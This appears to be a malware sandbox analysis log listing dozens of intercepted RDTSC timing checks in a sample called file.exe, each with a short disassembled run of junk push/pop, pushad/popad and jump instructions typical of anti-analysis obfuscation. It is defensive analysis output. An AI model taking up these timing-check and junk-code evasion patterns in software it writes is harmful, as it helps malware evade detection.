              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72EFEC second address: 72F011 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCE88BA0306h 0x00000008 jmp 00007FCE88BA0317h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F1B5 second address: 72F1BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F462 second address: 72F469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F5B6 second address: 72F5BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F5BC second address: 72F5C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F5C8 second address: 72F5E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE887ECE23h 0x00000007 js 00007FCE887ECE16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F5E5 second address: 72F5F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88BA030Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F759 second address: 72F75D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F75D second address: 72F763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706D96 second address: 706DB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCE887ECE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706E52 second address: 706E7F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 je 00007FCE88BA0308h 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FCE88BA0315h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706E7F second address: 706E89 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCE887ECE1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706E89 second address: 706EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCE88BA0311h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706EA5 second address: 706EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706EB6 second address: 706EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706EBC second address: 706F15 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCE887ECE29h 0x00000008 jmp 00007FCE887ECE23h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 push esi 0x00000011 sub dword ptr [ebp+1247BD50h], eax 0x00000017 pop edi 0x00000018 call 00007FCE887ECE19h 0x0000001d jnp 00007FCE887ECE1Eh 0x00000023 jc 00007FCE887ECE18h 0x00000029 push eax 0x0000002a jmp 00007FCE887ECE22h 0x0000002f mov eax, dword ptr [esp+04h] 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706F15 second address: 706F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706F1A second address: 706F32 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCE887ECE1Ch 0x00000008 jbe 00007FCE887ECE16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 push eax 0x00000016 pop eax 0x00000017 pop ecx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706F32 second address: 706F37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706F37 second address: 706F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7071A8 second address: 7071AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7076D4 second address: 7076D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707A95 second address: 707AFC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FCE88BA0308h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov dh, 98h 0x00000027 stc 0x00000028 lea eax, dword ptr [ebp+1248A50Ah] 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007FCE88BA0308h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 adc cx, 53E1h 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707AFC second address: 707B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707B00 second address: 707B18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B69074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707B18 second address: 707B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733A48 second address: 733A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733A4C second address: 733A61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8904C1C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A744 second address: 78A74E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCE8904C1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A74E second address: 78A765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FCE88B69071h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CBA2 second address: 78CBA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CBA6 second address: 78CBB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C68F second address: 78C695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C695 second address: 78C69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C871 second address: 78C882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FCE8904C1B8h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79056D second address: 790572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790572 second address: 790578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790578 second address: 79057C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79057C second address: 790590 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007FCE8904C1CEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790590 second address: 790594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DC76 second address: 79DC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE8904C1BDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DC87 second address: 79DC8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DB16 second address: 79DB1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DB1C second address: 79DB21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DB21 second address: 79DB27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1AE9 second address: 7A1AFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B6906Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8221 second address: 7A8225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8225 second address: 7A822F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCE88B69072h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A6AE9 second address: 7A6AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jl 00007FCE8904C1B8h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A6AF8 second address: 7A6AFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A6AFF second address: 7A6B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 je 00007FCE8904C1C2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A6B0C second address: 7A6B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A6DAC second address: 7A6DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FCE8904C1B6h 0x0000000a jbe 00007FCE8904C1B6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A70C9 second address: 7A70F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007FCE88B69079h 0x0000000b ja 00007FCE88B69066h 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A70F5 second address: 7A70F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7296 second address: 7A72AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE88B69072h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A72AC second address: 7A72B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A72B0 second address: 7A72D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FCE88B69074h 0x0000000e jmp 00007FCE88B6906Ch 0x00000013 push edi 0x00000014 pop edi 0x00000015 jo 00007FCE88B69072h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A756A second address: 7A756E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A756E second address: 7A7574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAC77 second address: 7AAC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA7DB second address: 7AA7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA7E1 second address: 7AA7E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA7E5 second address: 7AA7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA7EB second address: 7AA7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA950 second address: 7AA96E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B69074h 0x00000007 jg 00007FCE88B69066h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA96E second address: 7AA978 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCE8904C1BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ADF91 second address: 7ADF95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB9FD second address: 7BBA03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBA03 second address: 7BBA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE132 second address: 7BE15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007FCE8904C1C4h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007FCE8904C1B6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE15C second address: 7BE169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE169 second address: 7BE16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBA5A second address: 7CBA60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBA60 second address: 7CBA66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBBF4 second address: 7CBC10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCE88B69078h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E05F9 second address: 7E0601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0601 second address: 7E0606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0606 second address: 7E060D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E060D second address: 7E0616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0616 second address: 7E061A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1014 second address: 7E1018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1018 second address: 7E1049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8904C1C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FCE8904C1C6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1049 second address: 7E1067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B69070h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jnp 00007FCE88B6907Fh 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E11BE second address: 7E11C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E11C2 second address: 7E11D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCE88B69066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007FCE88B69068h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E11D6 second address: 7E11E0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCE8904C1BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2DBE second address: 7E2DFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FCE88B69078h 0x00000008 jmp 00007FCE88B69077h 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2DFF second address: 7E2E1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8904C1C2h 0x00000007 jng 00007FCE8904C1B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2E1B second address: 7E2E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FCE88B69066h 0x0000000b jmp 00007FCE88B69078h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2E42 second address: 7E2E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2E48 second address: 7E2E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2C48 second address: 7E2C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2C4E second address: 7E2C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE88B69075h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6D80 second address: 7E6D87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6FAB second address: 7E6FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E71B1 second address: 7E7215 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCE8904C1C2h 0x00000008 jmp 00007FCE8904C1BCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 mov dword ptr [ebp+122D1AB1h], edi 0x00000018 push dword ptr [ebp+122DB645h] 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007FCE8904C1B8h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 push 9192C999h 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 jmp 00007FCE8904C1C1h 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 popad 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E85D0 second address: 7E863F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B69079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FCE88B69075h 0x00000011 jmp 00007FCE88B69074h 0x00000016 popad 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007FCE88B69076h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jnc 00007FCE88B69066h 0x0000002b rdtsc
